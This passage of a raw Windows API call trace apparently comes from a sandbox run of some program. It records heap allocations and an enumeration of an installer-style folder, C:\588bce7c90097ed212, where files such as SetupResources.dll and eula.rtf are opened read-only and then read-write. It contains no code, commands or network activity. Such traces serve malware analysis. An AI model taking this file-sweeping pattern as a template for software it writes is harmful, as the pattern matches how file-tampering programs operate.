Parameter=0x1086e48, Context=0x0) returned 1 [0060.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0060.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.851] AreFileApisANSI () returned 1 [0060.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0060.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0060.851] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.851] GetFileType (hFile=0x41c) returned 0x1 [0060.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.851] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.852] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.852] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.852] CloseHandle (hObject=0x41c) returned 1 [0060.852] AreFileApisANSI () returned 1 [0060.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0060.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0060.852] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.852] GetFileType (hFile=0x41c) returned 0x1 [0060.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.852] CloseHandle (hObject=0x41c) returned 1 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.853] AreFileApisANSI () returned 1 [0060.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0060.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0060.853] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0060.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.854] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46bb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䥘")) returned 0 [0060.854] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0060.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0060.855] AreFileApisANSI () returned 1 [0060.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037", lpUsedDefaultChar=0x0) returned 27 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0060.855] AreFileApisANSI () returned 1 [0060.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037") returned 27 [0060.855] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037" (normalized: "c:\\588bce7c90097ed212\\1037"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.855] GetLastError () returned 0x5 [0060.855] GetLastError () returned 0x5 [0060.855] SetLastError (dwErrCode=0x5) [0060.855] GetLastError () returned 0x5 [0060.856] SetLastError (dwErrCode=0x5) [0060.856] GetLastError () returned 0x5 [0060.856] SetLastError (dwErrCode=0x5) [0060.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.856] AreFileApisANSI () returned 1 [0060.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037") returned 27 [0060.856] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037" (normalized: "c:\\588bce7c90097ed212\\1037"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.856] GetLastError () returned 0x5 [0060.856] GetLastError () returned 0x5 [0060.856] SetLastError (dwErrCode=0x5) [0060.856] GetLastError () returned 0x5 [0060.856] SetLastError (dwErrCode=0x5) [0060.856] GetLastError () returned 0x5 [0060.856] SetLastError (dwErrCode=0x5) [0060.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.857] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1038", cAlternateFileName="")) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.857] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.857] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.857] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0060.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.858] AreFileApisANSI () returned 1 [0060.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.858] AreFileApisANSI () returned 1 [0060.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0060.858] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.859] GetFileType (hFile=0x41c) returned 0x1 [0060.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.859] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.859] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.859] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.859] CloseHandle (hObject=0x41c) returned 1 [0060.859] AreFileApisANSI () returned 1 [0060.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0060.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0060.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, 